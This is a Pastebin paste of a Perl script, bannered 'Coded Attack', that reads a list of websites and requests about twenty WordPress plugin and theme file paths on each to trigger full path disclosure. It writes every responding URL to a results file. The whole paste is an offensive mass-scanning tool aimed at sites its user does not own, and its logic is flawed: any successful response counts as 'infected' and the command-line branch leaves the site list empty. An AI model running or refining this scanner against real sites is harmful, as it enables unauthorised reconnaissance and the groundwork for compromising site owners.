Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use HTTP::Request;
- use LWP::UserAgent;
- use LWP::Simple;
- system ("cls");
- system ("title Ful Path vul scanner ");
- print q(
- +---------------------------------------+
- | Wordpress Full Path Disclosure Tester |
- | Coded Attack |
- | Lover PerL |
- | Www.iq-team.org |
- +---------------------------------------+
- );
- sleep (1);
- $ARG = @ARGV;
- ($host,$outfile) = @ARGV;
- if(@ARGV eq 0)
- {
- print "\n\n[+] Enter List File Url :";
- $host=<STDIN>;
- chomp($host);
- print "[+] Enter Name File To Save :";
- $outfile=<STDIN>;
- chomp($outfile);
- open (SITE, "<$host") || die "[-] Can't open the List of site file !";
- @SITE = <SITE>;
- close SITE;
- }
- elsif ($ARG < 1)
- {
- $host = $ARGV[0];
- $outfile = $ARGV[1];
- }
- else
- {
- exit;
- }
- foreach my $xp (@SITE) {
- chomp $xp;
- $hosts = $xp;
- print "\n\n";
- print "\t\t Scanning ... $hosts\n";
- sleep(1);
- print "\n\n";
- @files = (
- "/wp-content/themes/dt-chocolate/index.php",
- "/wp-content/themes/massimo/sp-framework/sp-wp-login.php",
- "/wp-content/themes/eggo/sp-framework/sp-wp-login.php",
- "/wp-content/plugins/wp-codebox/wp-codebox.php?p=1&download=./",
- "/wp-content/themes/slash/index.php",
- "/wp-content/plugins/vote-it-up/voteitup.php",
- "/wp-content/plugins/wp-polls/polls-templates.php",
- "/wp-content/plugins/ultimate-security-check/wp-ultimate-security.php",
- "/wp-content/plugins/dynamic-headers/custom-header.php",
- "/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php",
- "/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php",
- "/wp-content/plugins/wp-events/wp-events.php",
- "/wp-content/plugins/wp-super-cache/wp-cache.php",
- "/wp-content/plugins/admin-menu-editor/menu-editor.php",
- "/wp-content/plugins/wp-photo-album/wppa.php",
- "/wp-content/plugins/wordpress-multibox-plugin/multibox.php",
- "/wp-content/plugins/superslider-show/superslider-show.php",
- "/wp-content/themes/sahifa/category.php",
- "/wp-content/themes/moneymasters/index.php",
- "/wp-content/plugins/sitepress-multilingual-cms/sitepress.php",
- "/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/",);
- foreach $vul(@files){
- $url = $hosts.$vul;
- $request = HTTP::Request->new(GET=>$url);
- $useragent = LWP::UserAgent->new();
- $response = $useragent->request($request);
- if ($response->is_success){
- print "The $url is infected\n";
- open(TN,">>$outfile");
- print TN "$url\n";
- close(TN);
- print "\n\n[*] Do you want to see The Result [Y/N] : ";
- $answer=<STDIN>;
- chomp($answer);
- print "+-----------------------------------------------------+\n";
- if (lc($answer) eq "y")
- {
- print $response->content;
- print "\n\n[*] Find your path easly ;) ";
- }
- else
- {
- print "\n[-] Ok as you like good bye :) !! \n\n";
- }
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement